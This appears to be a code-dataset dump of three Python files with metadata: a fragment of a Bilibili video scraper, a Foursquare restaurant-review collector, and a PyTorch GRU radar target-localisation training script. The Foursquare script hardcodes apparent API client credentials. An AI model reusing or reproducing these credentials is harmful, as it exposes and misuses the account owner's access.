re.findall(pattern,html) print("正在爬取第",str(i),"页") for it in items: link.append(it[0].strip()) title.append(it[1].strip()) watchs.append(it[2].strip()) num.append(it[3].strip()) day.append(it[4].strip()) up_space.append(it[5].strip()) up_names.append(it[6].strip()) except: pass with open('输出.csv', mode='w',newline='',encoding = 'gb18030') as csv_file: fieldnames = ['视频链接', '标题', '播放量','弹幕量','UP空间','up'] writer = csv.DictWriter(csv_file, fieldnames=fieldnames) writer.writeheader() n = 0 for li in link: try: writer.writerow({'视频链接':link[n], '标题':title[n], '播放量':watchs[n],'弹幕量':num[n],'UP空间':up_space[n],'up':up_names[n]}) n = n + 1 except: pass print("爬取完成!")
null
spider/B站_re_csv.py
B站_re_csv.py
py
2,532
python
en
code
null
code-starcoder2
83
[ { "api_name": "requests.get", "line_number": 18, "usage_type": "call" }, { "api_name": "re.compile", "line_number": 21, "usage_type": "call" }, { "api_name": "re.S", "line_number": 21, "usage_type": "attribute" }, { "api_name": "re.findall", "line_number": 22, "usage_type": "call" }, { "api_name": "csv.DictWriter", "line_number": 39, "usage_type": "call" } ]
183828008
# -*- coding: utf8 -*- import json, requests import datetime train_text="" final_count = 0 near_list = ['Chicago', 'Manchester', 'London', 'Liverpool', 'Oxford'] for k in range(len(near_list)): # 버거 키워드로 검색 시 추천 식당받기 params = dict( client_id='', client_secret='', v='20170801', near = near_list[k], #near='Chicago', #section = 'food', query='meal', limit=50 ) #EXPLORE = get venue recommendations url = 'https://api.foursquare.com/v2/venues/explore' resp = requests.get(url=url, params=params) data = json.loads(resp.text) res_id = [] res_name = [] for i in range(len(data['response']['groups'][0]['items'])): res_id.append(data['response']['groups'][0]['items'][i]['venue']['id']) res_name.append(data['response']['groups'][0]['items'][i]['venue']['name']) count = 0 url1 = 'https://api.foursquare.com/v2/venues/' url3 = '/tips' for i in range(len(res_name)): url2 = str(res_id[i]) url = url1+url2+url3 params2 = dict( venue_id = url2, client_id='FN5PS1FYKITOSMYDRGMK3UGQVAVZD5GNTCPGBDTFDHJLMC42', client_secret='PXPLYT5M23203GXN4ABRCZEKC5ETYJX3EU3SQZKDF20FNSXC', sort = 'popular', #popular , recent 가능 limit= 1000, offset=1, v='20170101' ) resp = requests.get(url = url, params=params2) data = json.loads(resp.text) print('----------------------------------------') print(res_name[i], '식당의 리뷰 수집') print('----------------------------------------') print('리뷰 수 : ',data['response']['tips']['count']) for j in range(len(data['response']['tips']['items'])): print(j+1, " ",data['response']['tips']['items'][j]['text']) train_text = train_text + str(data['response']['tips']['items'][j]['text']) train_text = train_text + " :flag: " count += 1 when = data['response']['tips']['items'][j]['createdAt'] when = datetime.datetime.fromtimestamp(when) print(' 의 리뷰 작성일 : ',when) print('---------------------------------------------') print(near_list[k], '지역의 수집 리뷰 : ',count, '개') print('---------------------------------------------') final_count += count print('최종 수집 리뷰 : ', final_count,'개') # SAVE REVIEW f = open('./train_reviews.txt','w') f.write(train_text) f.close()
null
Foursquare_API/get_res_reviews.py
get_res_reviews.py
py
2,395
python
en
code
null
code-starcoder2
83
[ { "api_name": "requests.get", "line_number": 27, "usage_type": "call" }, { "api_name": "json.loads", "line_number": 28, "usage_type": "call" }, { "api_name": "requests.get", "line_number": 54, "usage_type": "call" }, { "api_name": "json.loads", "line_number": 55, "usage_type": "call" }, { "api_name": "datetime.datetime.fromtimestamp", "line_number": 67, "usage_type": "call" }, { "api_name": "datetime.datetime", "line_number": 67, "usage_type": "attribute" } ]
291849764
import torch import torchvision import torch.nn as nn import torch.optim as optim import numpy as np # from mat4py import loadmat # #from torchsummary import summary # from graphviz import Digraph # from torchviz import make_dot # from graphviz import Source import time HOME = 0 if torch.cuda.is_available() and HOME == 0: from google.colab import drive drive.mount("/content/gdrive", force_remount=True) c = 3 * 10 ** 8 dt = 10 ** (-7) Ts = 0.8000e-06 L = int(Ts / dt) T = 400 class BuildGRUStack(nn.Module): def __init__(self, input_size, rnn_size, num_layers): super(BuildGRUStack, self).__init__() self.input_size = input_size self.rnn_size = rnn_size self.num_layers = num_layers l_i2h_lst = [nn.Linear(self.input_size, 3 * self.rnn_size)] l_h2h_lst = [nn.Linear(self.rnn_size, 3 * self.rnn_size)] # l_bn_lst = [nn.BatchNorm1d(3 * self.rnn_size)] # self.l_do = nn.Dropout(0.25) for L in range(1, self.num_layers): l_i2h_lst.append(nn.Linear(self.rnn_size, 3 * self.rnn_size)) l_h2h_lst.append(nn.Linear(self.rnn_size, 3 * self.rnn_size)) # l_bn_lst.append(nn.BatchNorm1d(3 * self.rnn_size)) self.l_i2h = nn.ModuleList(l_i2h_lst) self.l_h2h = nn.ModuleList(l_h2h_lst) # self.l_bn = nn.ModuleList(l_bn_lst) def forward(self, x, prev_hs): self.x_size = [] self.prev_h = 0 self.next_hs = [] self.i2h = [] self.h2h = [] for L in range(self.num_layers): self.prev_h = prev_hs[L] if L == 0: self.x = x else: self.x = self.next_hs[L - 1] # self.i2h.append(self.l_do(self.l_bn[L](self.l_i2h[L](self.x)))) # self.h2h.append(self.l_do(self.l_bn[L](self.l_h2h[L](self.prev_h)))) self.i2h.append(self.l_i2h[L](self.x)) self.h2h.append(self.l_h2h[L](self.prev_h)) Wx1, Wx2, Wx3 = self.i2h[L].chunk(3, dim=1) # it should return 4 tensors self.rnn_size Uh1, Uh2, Uh3 = self.h2h[L].chunk(3, dim=1) zt = torch.sigmoid(Wx1 + Uh1) rt = torch.sigmoid(Wx2 + Uh2) h_candidate = torch.tanh(Wx3 + rt * Uh3) ht = (1-zt) * self.prev_h + zt * h_candidate self.next_hs.append(ht) return torch.stack(self.next_hs) class BuildGRUUnrollNet(nn.Module): def __init__(self, num_unroll, num_layers, rnn_size, input_size): super(BuildGRUUnrollNet, self).__init__() self.num_unroll = num_unroll self.num_layers = num_layers self.rnn_size = rnn_size self.input_size = input_size self.outputs = [] self.output = [] self.now_h = [] self.buildGRUstack_lst = [] for i in range(0, self.num_unroll): self.buildGRUstack_lst.append(BuildGRUStack(self.input_size, self.rnn_size, self.num_layers)) self.buildGRUstack = nn.ModuleList(self.buildGRUstack_lst) def forward(self, x, init_states_input): self.init_hs = [] self.now_hs = [] self.outputs = [] init_states = init_states_input.reshape((init_states_input.size(0), self.num_layers * 2, self.rnn_size)) init_states_lst = list(init_states.chunk(self.num_layers * 2, 1)) for i in range(self.num_layers): self.init_hs.append(init_states_lst[2 * i].reshape(init_states_input.size(0), self.rnn_size)) self.now_hs.append(torch.stack(self.init_hs)) for i in range(self.num_unroll): self.now_h = self.buildGRUstack[i](x[:, torch.arange(i*2*T,(i+1)*2*T)], self.now_hs[i]) self.now_hs.append(self.now_h) self.outputs.append(self.now_hs[i + 1][-1]) # for L in range(self.num_layers): # setattr(self, 'hid_%d_%d' %(i, L), self.now_hs[i][L]) # setattr(self, 'cell_%d_%d' %(i, L), self.now_cs[i][L]) for i in range(1, self.num_unroll): for j in range(self.num_layers): self.buildGRUstack[i].l_i2h[j].weight.data = self.buildGRUstack[0].l_i2h[j].weight.data self.buildGRUstack[i].l_h2h[j].weight.data = self.buildGRUstack[0].l_h2h[j].weight.data self.buildGRUstack[i].l_i2h[j].bias.data = self.buildGRUstack[0].l_i2h[j].bias.data self.buildGRUstack[i].l_h2h[j].bias.data = self.buildGRUstack[0].l_h2h[j].bias.data self.buildGRUstack[i].l_i2h[j].weight.grad = self.buildGRUstack[0].l_i2h[j].weight.grad self.buildGRUstack[i].l_h2h[j].weight.grad = self.buildGRUstack[0].l_h2h[j].weight.grad self.buildGRUstack[i].l_i2h[j].bias.grad = self.buildGRUstack[0].l_i2h[j].bias.grad self.buildGRUstack[i].l_h2h[j].bias.grad = self.buildGRUstack[0].l_h2h[j].bias.grad self.output = self.outputs[0] for i in range(1, self.num_unroll): self.output = torch.cat((self.output, self.outputs[i]), 1) return self.output class GetGRUNet(nn.Module): def __init__(self, num_unroll, num_layers, rnn_size, output_size, input_size): super(GetGRUNet, self).__init__() self.num_unroll, self.num_layers, self.rnn_size, self.output_size, self.input_size = num_unroll, num_layers, rnn_size, output_size, input_size self.l_pred_l = nn.Linear(self.num_unroll * self.rnn_size, self.output_size) self.GRUnet = BuildGRUUnrollNet(self.num_unroll, self.num_layers, self.rnn_size, self.input_size) self.l_pred_bn = nn.BatchNorm1d(self.output_size) # setattr(self, 'GRUNetLinear', self.l_pred_l) def forward(self, x, init_states_input): self.GRU_output = self.GRUnet(x, init_states_input) self.pred = self.l_pred_bn(self.l_pred_l(self.GRU_output)) return self.pred ###########Usage####################################### # input_size = 20 # output_size = 50 # rnn_size = 10 # num_layers = 2 # num_unroll = 3 # # graph of net # x = torch.rand(3, input_size) # z = torch.zeros(3, rnn_size * num_layers * 2) # model = BuildGRUStack(input_size, rnn_size, num_layers) # init_hs = [] # init_cs = [] # init_states = z.reshape((z.size(0),num_layers * 2, rnn_size)) # init_states_lst = list(init_states.chunk(num_layers * 2,1)) # for i in range(num_layers): # init_hs.append(init_states_lst[2*i].reshape(num_layers,rnn_size)) # init_cs.append(init_states_lst[2*i+1].reshape(num_layers,rnn_size)) # now_hs, now_cs = model(x, init_hs, init_cs) # temp = make_dot((now_hs[2], now_cs[2]), params=dict(list(model.named_parameters()))) # s = Source(temp, filename="BuildGRUStack.gv", format="png") # s.view() # # model = BuildGRUUnrollNet(num_unroll, num_layers, rnn_size, input_size) # out = model(x, z) # temp = make_dot(out, params=dict(list(model.named_parameters())+ [('x', x)]+ [('z', z)])) # s = Source(temp, filename="BuildGRUUnrollNet.gv", format="png") # s.view() # # model = GetGRUNet(num_unroll, num_layers, rnn_size, output_size, input_size) # output = model(x,z) # for i in range(1, num_unroll): # for j in range(num_layers): # model.GRUnet.buildGRUstack[i].l_i2h[j].weight = model.GRUnet.buildGRUstack[0].l_i2h[j].weight # model.GRUnet.buildGRUstack[i].l_h2h[j].weight = model.GRUnet.buildGRUstack[0].l_h2h[j].weight # model.GRUnet.buildGRUstack[i].l_i2h[j].bias = model.GRUnet.buildGRUstack[0].l_i2h[j].bias # model.GRUnet.buildGRUstack[i].l_h2h[j].bias = model.GRUnet.buildGRUstack[0].l_h2h[j].bias # print(model) # temp = make_dot(output, params=dict(list(model.named_parameters())+ [('x', x)]+ [('z', z)])) # s = Source(temp, filename="test.gv", format="png") # s.view() # modell = nn.Sequential() # modell.add_module('W0', nn.Linear(8, 16)) # modell.add_module('tanh', nn.Tanh()) # modell.add_module('W1', nn.Linear(16, 1)) # # x = torch.randn(1,8) # # temp = make_dot(modell(x), params=dict(modell.named_parameters())) # # s = Source(temp, filename="test.gv", format="png") # s.view() class MultiClassNLLCriterion(torch.nn.Module): def __init__(self): super(MultiClassNLLCriterion, self).__init__() self.lsm = nn.LogSoftmax(dim=1) self.nll = nn.NLLLoss() self.output = 0 self.outputs = 0 def forward(self, inputs, target): self.output = self.lsm(inputs) shape = target.shape self.outputs = 0 # print(self.output.shape) # print(target.shape) for i in range(0, shape[1]): self.outputs = self.outputs + self.nll(self.output, target[:, i].squeeze()) return self.outputs # /shape[1] # match number def AccS(label, pred_prob): num_nonz = label.shape[1] _, pred = pred_prob.topk(num_nonz) # ?! pred = pred.float() t_score = torch.zeros(label.shape).to(device) # print(label.get_device()) # print(pred.get_device()) for i in range(0, num_nonz): for j in range(0, num_nonz): t_score[:, i].add_(label[:, i].float().eq(pred[:, j]).float()) return t_score.mean() # loose match def AccL(label, pred_prob): num_nonz = label.shape[1] _, pred = pred_prob.topk(20) # ?! pred = pred.float() t_score = torch.zeros(label.shape).to(device) for i in range(0, num_nonz): for j in range(0, 20): t_score[:, i].add_( label[:, i].float().eq(pred[:, j]).float()) # t_score[:,i].add(label[:,i].eq(pred[:,j])).float() return t_score.mean() # sctrict match def AccM(label, pred_prob): num_nonz = label.shape[1] _, pred = pred_prob.topk(num_nonz) # ?! pred = pred.float() t_score = torch.zeros(label.shape).to(device) for i in range(0, num_nonz): for j in range(0, num_nonz): t_score[:, i].add_( label[:, i].float().eq(pred[:, j]).float()) # t_score[:,i].add(label[:,i].eq(pred[:,j])).float() return t_score.sum(1).eq(num_nonz).sum().item() * 1. / pred.shape[0] gpu = 1 # gpu id if torch.cuda.is_available() and HOME == 0: batch_size = 256 # 10# training batch size else: batch_size = 5 # 600000 # lr = 0.002 # basic learning rate lr_decay_startpoint = 250 # learning rate from which epoch num_epochs = 200 # total training epochs max_grad_norm = 5.0 clip_gradient = 4.0 N = 8 # the number of receivers M = 3 # the number of transmitters K = 3 # the number of targets # task related parameters # task: y = Ax, given A recovery sparse x from y dataset = 'uniform' # type of non-zero elements: uniform ([-1,-0.1]U[0.1,1]), unit (+-1) # num_nonz = K*N*M*2 # number of non-zero elemetns to recovery: 3,4,5,6,7,8,9,10 num_nonz = K # number of non-zero elemetns to recovery: 3,4,5,6,7,8,9,10 input_size = T*2 # dimension of observation vector y output_size = 13*13 # dimension of sparse vector x # model hyper parameters rnn_size = 200 # number of units in RNN cell num_layers = 2 # number of stacked RNN layers num_unroll = N # number of RNN unrolled time steps # torch.set_num_threads(16) # manualSeed = torch.randint(1,10000,(1,)) # print("Random seed " + str(manualSeed.item())) # torch.set_default_tensor_type(torch.FloatTensor) device = torch.device("cuda:0" if torch.cuda.is_available() and HOME == 0 else "cpu") print(device) if torch.cuda.is_available(): train_size = int(batch_size*800) # valid_size = int(batch_size*200) # # else: train_size = 100 # 600000 # valid_size = 10 # 100000 # print(train_size) print(valid_size) print(batch_size) print(N*input_size) valid_data = torch.zeros(valid_size, N*input_size).to(device) valid_label = torch.zeros(valid_size, num_nonz).type(torch.LongTensor).to(device) batch_data = torch.zeros(batch_size, N*input_size).to(device) batch_label = torch.zeros(batch_size, num_nonz).to(device) # for MultiClassNLLCriterion LOSS batch_zero_states = torch.zeros(batch_size, num_layers * rnn_size * 2).to(device) # init_states for GRU # AccM, AccL, Accs = 0, 0, 0 err = 0 model_all = "model_l_" + str(num_layers) + "t_" + str(num_unroll) + '_gru_mimo_' + str(rnn_size) logger_file = model_all + str(dataset) + "_" + str(num_nonz) + '.log' if torch.cuda.is_available(): logger_file = "/content/gdrive/My Drive/" + logger_file # or torch.save(net, PATH) else: logger_file = "./" + logger_file logger = open(logger_file, 'w') # for k,v in pairs(opt) do logger:write(k .. ' ' .. v ..'\n') end # logger:write('network have ' .. paras:size(1) .. ' parameters' .. '\n') # logger:close() # torch.manual_seed(10) # if torch.cuda.is_available(): # mat_A = torch.load("/content/gdrive/My Drive/mat_A.pt").to(device) # else: # mat_A = torch.load("./mat_A.pt").to(device) def gen_mimo_samples(SNR_dB, M, N, K, NOISE, H): DB = 10. ** (0.1 * SNR_dB) # N = 8 # the number of receivers # M = 1 # the number of transmitters # K = 1 # the number of targets # np.random.seed(15) # Position of receivers x_r = np.array([1000, 2000, 2500, 2500, 2000, 1000, 500, 500])#*np.random.rand(1)# + 500 * (np.random.rand(N) - 0.5)) # \ # 1500,3000,500,2500,1000,1500,500,3000,\ # 2500,3500,1000,3500,2000,4000,3000,3000]+500*(np.random.rand(N)-0.5)) y_r = np.array([500, 500, 1000, 2000, 2500, 2500, 2000, 1500])#*np.random.rand(1)# + 500 * (np.random.rand(N) - 0.5)) # \ # 3500,3500,500,4000,4000,2500,3000,500,\ # 3500,3000,2000,1000,2000,500,4000,1500]+500*(np.random.rand(N)-0.5)) # Position of transmitters x_t = np.array([0, 4000, 4000, 0, 1500, 0, 4000, 2000])#+500*np.random.rand(1) y_t = np.array([0, 0, 4000, 4000, 4000, 1500, 1500, 0])#+500*np.random.rand(1) # NOISE = 1 # on/off noise # H = 1 # on/off êîýôôèöèåíòû îòðàæåíèÿ rk = np.zeros([K, M, N]); tk = np.zeros([K, M, N]); tau = np.zeros([K, M, N]); if H == 0: h = np.ones([K, M, N]) else: h = (np.random.randn(K, M, N) + 1j * np.random.randn(K, M, N)) / np.sqrt(2) s = np.zeros([M, L]) + 1j * np.zeros([M, L]) for m in range(M): s[m] = np.exp(1j * 2 * np.pi * (m) * np.arange(L) / M) / np.sqrt(L);#np.sqrt(0.5)*(np.random.randn(1,L)+1j*np.random.randn(1,L))/np.sqrt(L);# # # Ls = 875 # Le = Ls + 125 * 6 # dx = 125 Ls = 0 Le = Ls + 4000 dx = 333 dy = dx dy = dx x_grid = np.arange(Ls, Le, dx) y_grid = np.arange(Ls, Le, dy) size_grid_x = len(x_grid) size_grid_y = len(y_grid) grid_all_points = [[i, j] for i in x_grid for j in y_grid] grid_all_points_a = np.array(grid_all_points) r = np.zeros(size_grid_x * size_grid_y * M * N) k_random_grid_points = np.array([]) # Position of targets x_k = np.zeros([K]) y_k = np.zeros([K]) for kk in range(K): x_k[kk] = np.random.randint(Ls,Le)+np.random.rand(1) y_k[kk] = np.random.randint(Ls,Le)+np.random.rand(1) k_random_grid_points_i = np.array([]) k_random_grid_points = np.array([]) for k in range(K): calc_dist = np.sqrt((grid_all_points_a[range(size_grid_x * size_grid_y), 0] - x_k[k]) ** 2 \ + (grid_all_points_a[range(size_grid_x * size_grid_y), 1] - y_k[k]) ** 2) # grid_all_points_a[calc_dist.argmin()] k_random_grid_points_i = np.append(k_random_grid_points_i, calc_dist.argmin()) # Time delays for k in range(K): for m in range(M): for n in range(N): tk[k, m, n] = np.sqrt((x_k[k] - x_t[m]) ** 2 + (y_k[k] - y_t[m]) ** 2) rk[k, m, n] = np.sqrt((x_k[k] - x_r[n]) ** 2 + (y_k[k] - y_r[n]) ** 2) tau[k, m, n] = (tk[k, m, n] + rk[k, m, n]) / c r_glob = np.zeros([size_grid_x * size_grid_y * M * N]) + 1j * np.zeros([size_grid_x * size_grid_y * M * N]) for m in range(M): for n in range(N): for k in range(K): r_glob[k_random_grid_points_i[k].astype(int)] = DB[k] * h[k, m, n] * \ np.sqrt(200000000000) * (1 / tk[k, m, n]) * (1 / rk[k, m, n]) k_random_grid_points = np.append(k_random_grid_points,k_random_grid_points_i) k_random_grid_points_i = k_random_grid_points_i + size_grid_x * size_grid_y # for m in range(M): # for n in range(N): # k_random_grid_points = np.append(k_random_grid_points,k_random_grid_points[-1] + size_grid_x * size_grid_y) r[k_random_grid_points.astype(int)] = 1 if NOISE == 0: x = np.zeros([N, T]) + 1j * np.zeros([N, T]) else: x = (np.random.randn(N, T) + 1j * np.random.randn(N, T)) / np.sqrt(2) for k in range(K): for m in range(M): for n in range(N): l = np.floor(tau[k, m, n] / dt) l = l.astype(int) x[n, range(l, l + L)] = x[n, range(l, l + L)] + DB[k] * s[m, :] * h[k, m, n] * \ np.sqrt(200000000000) * (1 / tk[k, m, n]) * (1 / rk[k, m, n]) x_flat = x[0, :].transpose(); for n in range(1, N): x_flat = np.concatenate([x_flat, x[n, :].transpose()], axis=0) return x_flat, r, r_glob, k_random_grid_points def gen_batch(batch_size, num_nonz, N, M, K, NOISE, H): # NOISE = 1 # H = 1 SNR_dB = np.random.rand(3) y, rr, rr_glob, label = gen_mimo_samples(SNR_dB, M, N, K, NOISE, H) batch_data = torch.zeros(batch_size, 2*y.shape[0]) # batch_label = torch.zeros(batch_size, 2*label.shape[0]).to(device) batch_label = torch.zeros(batch_size, label[range(num_nonz)].shape[0]) r1 = 40 r2 = 20 for i in range(batch_size): # SNR_dB = ((r1 - r2) * torch.rand((1,)) + r2).item() for k in range(K): SNR_dB[k] = 20 # ((r1 - r2) * np.random.rand(1) + r2) y, rr, rr_glob, label = gen_mimo_samples(SNR_dB, M, N, K, NOISE, H) batch_data[i] = torch.cat([torch.from_numpy(y.real),torch.from_numpy(y.imag)]) # batch_data[i] = torch.cat([torch.from_numpy(np.abs(y))]).to(device) # batch_label[i] = torch.cat([torch.from_numpy(label),torch.from_numpy(label+M*N*36)]).to(device) batch_label[i] = torch.cat([torch.from_numpy(label[range(num_nonz)])]) return batch_label.type(torch.LongTensor).to(device), batch_data.to(device) print("building validation set") for i in range(0, valid_size, batch_size): # mat_A = torch.rand(output_size, input_size).to(device) batch_label, batch_data = gen_batch(batch_size, num_nonz, N, M, K, 1, 1) # print(batch_label.shape) # print("batch_data shape = " + str(batch_data.shape)) # print("valid_data shape = " + str(valid_data.shape)) # print(range(i,i+batch_size-1)) valid_data[range(i, i + batch_size), :] = batch_data valid_label[range(i, i + batch_size), :] = batch_label print('done') best_valid_accs = 0 base_epoch = lr_decay_startpoint base_lr = lr optimState = {'learningRate': 0.001, 'weigthDecay': 0.0001} net = GetGRUNet(num_unroll, num_layers, rnn_size, output_size, input_size) # print(net) # device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") net.to(device) # summary(net,[(num_layers,input_size),(num_layers,rnn_size * num_layers * 2)]) # summary(net,[(batch_size, input_size),(batch_size, num_layers * rnn_size * 2)]) # create a stochastic gradient descent optimizer # optimizer = optim.RMSprop(params=net.parameters(), lr=0.001, alpha=0.9, eps=1e-04, weight_decay=0.0001, momentum=0, centered=False) # create a loss function LOSS = MultiClassNLLCriterion() optimizer = optim.RMSprop(params=net.parameters(), lr=optimState['learningRate'], \ alpha=0.9, eps=1e-05, weight_decay=optimState['weigthDecay'], momentum=0.0, centered=False) # scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, milestones=[3,6,9,12,15], gamma=0.25) # scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, mode='min', factor=0.1, patience=4, # verbose=True, threshold=0.0001, threshold_mode='rel', \ # cooldown=0, min_lr=0, eps=1e-08) scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=8, gamma=0.5) if torch.cuda.is_available(): checkpoint = torch.load("/content/gdrive/My Drive/" + model_all + "_" + str(num_nonz) + ".pth") # or torch.save(net, PATH) else: checkpoint = torch.load("./" + model_all + "_" + str(num_nonz) + ".pth") # or torch.save(net, PATH) net.load_state_dict(checkpoint['model_state_dict']) optimizer.load_state_dict(checkpoint['optimizer_state_dict']) scheduler.load_state_dict(checkpoint['scheduler_state_dict']) epoch = checkpoint['epoch'] + 1 loss = checkpoint['loss'] # epoch = 0 print(net) print(device) # mat_A = torch.rand(output_size, input_size).to(device) for epoch in range(epoch, num_epochs): for param_group in optimizer.param_groups: print(param_group['lr']) # learing rate self - adjustment # if(epoch > 250): # optimState['learningRate'] = base_lr / (1 + 0.06 * (epoch - base_epoch)) # if(epoch % 50 == 0): base_epoch = epoch; base_lr= base_lr * 0.25 logger = open(logger_file, 'a') # train train_accs = 0 train_accl = 0 train_accm = 0 train_err = 0 nbatch = 0 net.train() start = time.time() for i in range(0, train_size, batch_size): batch_label, batch_data = gen_batch(batch_size, num_nonz, N, M, K, 1, 1) batch_label.to(device) optimizer.zero_grad() pred_prob = net(batch_data, batch_zero_states).to(device) # 0 or 1?! err = LOSS(pred_prob, batch_label.to(device)) err.backward() with torch.no_grad(): for name, param in net.named_parameters(): # print(name) # print(param.grad.data) param.grad.clamp_(-4.0, 4.0) gnorm = param.grad.norm() if (gnorm > max_grad_norm): param.grad.mul_(max_grad_norm / gnorm) optimizer.step() # print(pred_prob.get_device()) # print(batch_label.get_device()) batch_accs = AccS(batch_label[:, range(0, num_nonz)], pred_prob.to(device).float()) batch_accl = AccL(batch_label[:, range(0, num_nonz)], pred_prob.to(device).float()) batch_accm = AccM(batch_label[:, range(0, num_nonz)], pred_prob.to(device).float()) train_accs = train_accs + batch_accs.item() train_accl = train_accl + batch_accl.item() train_accm = train_accm + batch_accm train_err = train_err + err.item() nbatch = nbatch + 1 if (nbatch) % 255 == 1: print("Epoch " + str(epoch) + " Batch " + str(nbatch) + " {:.4} {:.4} {:.4} loss = {:.4}".format(batch_accs, batch_accl, batch_accm, err.item())) # for param_group in optimizer.param_groups: # print(param_group['lr']) end = time.time() print("Train [{}] Time {} s-acc {:.4} l-acc {:.4} m-acc {:.4} err {:.4}".format(epoch, end - start, \ train_accs / nbatch, train_accl / nbatch, \ train_accm / nbatch, train_err / nbatch)) logger.write("Train [{}] Time {:.4} s-acc {:.4} l-acc {:.4} m-acc {:.4} err {:.4}\n".format(epoch, end - start, \ train_accs / nbatch, train_accl / nbatch, \ train_accm / nbatch, train_err / nbatch)) # eval nbatch = 0 valid_accs = 0 valid_accl = 0 valid_accm = 0 valid_err = 0 start = time.time() net.eval() for i in range(0, valid_size, batch_size): batch_data = valid_data[range(i, i + batch_size), :] batch_label[:, range(0, num_nonz)] = valid_label[range(i, i + batch_size), :] pred_prob = net(batch_data, batch_zero_states) err = LOSS(pred_prob, batch_label) batch_accs = AccS(batch_label[:, range(0, num_nonz)], pred_prob.float()) batch_accl = AccL(batch_label[:, range(0, num_nonz)], pred_prob.float()) batch_accm = AccM(batch_label[:, range(0, num_nonz)], pred_prob.float()) valid_accs = valid_accs + batch_accs.item() valid_accl = valid_accl + batch_accl.item() valid_accm = valid_accm + batch_accm valid_err = valid_err + err.item() nbatch = nbatch + 1 # scheduler.step(valid_err / nbatch) scheduler.step() # if (nbatch+99) % 100 == 0: # print("Eval Epoch " + str(epoch) + " Batch " + str(nbatch) + " {:.4} {:.4} {:.4} loss = {:.4}".format(batch_accs, batch_accl, # batch_accm, err.item())) end = time.time() print("Valid [{}] Time {} s-acc {:.4} l-acc {:.4} m-acc {:.4} err {:.4}".format(epoch, end - start, \ valid_accs / nbatch, valid_accl / nbatch, \ valid_accm / nbatch, valid_err / nbatch)) logger.write("Valid [{}] Time {} s-acc {:.4} l-acc {:.4} m-acc {:.4} err {:.4}\n".format(epoch, end - start, \ valid_accs / nbatch, valid_accl / nbatch, \ train_accm / nbatch, valid_err / nbatch)) # if(valid_accs > best_valid_accs): # best_valid_accs = valid_accs # print("saving model") # logger.write('saving model\n') # checkpoint = {'epoch': epoch, # 'model_state_dict': net.state_dict(), # 'optimizer_state_dict': optimizer.state_dict(), # 'loss': err.item()} # # torch.save(checkpoint, 'checkpoint.pth') # torch.save(checkpoint, "./checkpoints/"+model_all+"_"+str(num_nonz)+".pth") #or torch.save(net, PATH) # #net.load_state_dict(torch.load(PATH)) # or the_model = torch.load(PATH) # if(epoch % 2 == 0): print("saving model") logger.write('saving model\n') checkpoint = {'epoch': epoch, \ 'model_state_dict': net.state_dict(), \ 'optimizer_state_dict': optimizer.state_dict(), \ 'scheduler_state_dict': scheduler.state_dict(), \ 'loss': err.item()} if torch.cuda.is_available(): torch.save(checkpoint, "/content/gdrive/My Drive/" + model_all + "_" + str(num_nonz) + ".pth") # or torch.save(net, PATH) else: torch.save(checkpoint, "./" + model_all + "_" + str(num_nonz) + ".pth") # or torch.save(net, PATH) logger.close()
null
model_gru_mimo_0.py
model_gru_mimo_0.py
py
28,077
python
en
code
null
code-starcoder2
83
[ { "api_name": "torch.cuda.is_available", "line_number": 14, "usage_type": "call" }, { "api_name": "torch.cuda", "line_number": 14, "usage_type": "attribute" }, { "api_name": "google.colab.drive.mount", "line_number": 16, "usage_type": "call" }, { "api_name": "google.colab.drive", "line_number": 16, "usage_type": "name" }, { "api_name": "torch.nn.Module", "line_number": 25, "usage_type": "attribute" }, { "api_name": "torch.nn", "line_number": 25, "usage_type": "name" }, { "api_name": "torch.nn.Linear", "line_number": 33, "usage_type": "call" }, { "api_name": "torch.nn", "line_number": 33, "usage_type": "name" }, { "api_name": "torch.nn.Linear", "line_number": 34, "usage_type": "call" }, { "api_name": "torch.nn", "line_number": 34, "usage_type": "name" }, { "api_name": "torch.nn.Linear", "line_number": 38, "usage_type": "call" }, { "api_name": "torch.nn", "line_number": 38, "usage_type": "name" }, { "api_name": "torch.nn.Linear", "line_number": 39, "usage_type": "call" }, { "api_name": "torch.nn", "line_number": 39, "usage_type": "name" }, { "api_name": "torch.nn.ModuleList", "line_number": 41, "usage_type": "call" }, { "api_name": "torch.nn", "line_number": 41, "usage_type": "name" }, { "api_name": "torch.nn.ModuleList", "line_number": 42, "usage_type": "call" }, { "api_name": "torch.nn", "line_number": 42, "usage_type": "name" }, { "api_name": "torch.sigmoid", "line_number": 64, "usage_type": "call" }, { "api_name": "torch.sigmoid", "line_number": 65, "usage_type": "call" }, { "api_name": "torch.tanh", "line_number": 66, "usage_type": "call" }, { "api_name": "torch.stack", "line_number": 69, "usage_type": "call" }, { "api_name": "torch.nn.Module", "line_number": 72, "usage_type": "attribute" }, { "api_name": "torch.nn", "line_number": 72, "usage_type": "name" }, { "api_name": "torch.nn.ModuleList", "line_number": 86, "usage_type": "call" }, { "api_name": "torch.nn", "line_number": 86, "usage_type": "name" }, { "api_name": "torch.stack", "line_number": 100, "usage_type": "call" }, { "api_name": "torch.arange", "line_number": 103, "usage_type": "call" }, { "api_name": "torch.cat", "line_number": 121, "usage_type": "call" }, { "api_name": "torch.nn.Module", "line_number": 126, "usage_type": "attribute" }, { "api_name": "torch.nn", "line_number": 126, "usage_type": "name" }, { "api_name": "torch.nn.Linear", "line_number": 131, "usage_type": "call" }, { "api_name": "torch.nn", "line_number": 131, "usage_type": "name" }, { "api_name": "torch.nn.BatchNorm1d", "line_number": 133, "usage_type": "call" }, { "api_name": "torch.nn", "line_number": 133, "usage_type": "name" }, { "api_name": "torch.nn", "line_number": 198, "usage_type": "attribute" }, { "api_name": "torch.nn.LogSoftmax", "line_number": 202, "usage_type": "call" }, { "api_name": "torch.nn", "line_number": 202, "usage_type": "name" }, { "api_name": "torch.nn.NLLLoss", "line_number": 203, "usage_type": "call" }, { "api_name": "torch.nn", "line_number": 203, "usage_type": "name" }, { "api_name": "torch.zeros", "line_number": 223, "usage_type": "call" }, { "api_name": "torch.zeros", "line_number": 237, "usage_type": "call" }, { "api_name": "torch.zeros", "line_number": 250, "usage_type": "call" }, { "api_name": "torch.cuda.is_available", "line_number": 260, "usage_type": "call" }, { "api_name": "torch.cuda", "line_number": 260, "usage_type": "attribute" }, { "api_name": "torch.device", "line_number": 290, "usage_type": "call" }, { "api_name": "torch.cuda.is_available", "line_number": 290, "usage_type": "call" }, { "api_name": "torch.cuda", "line_number": 290, 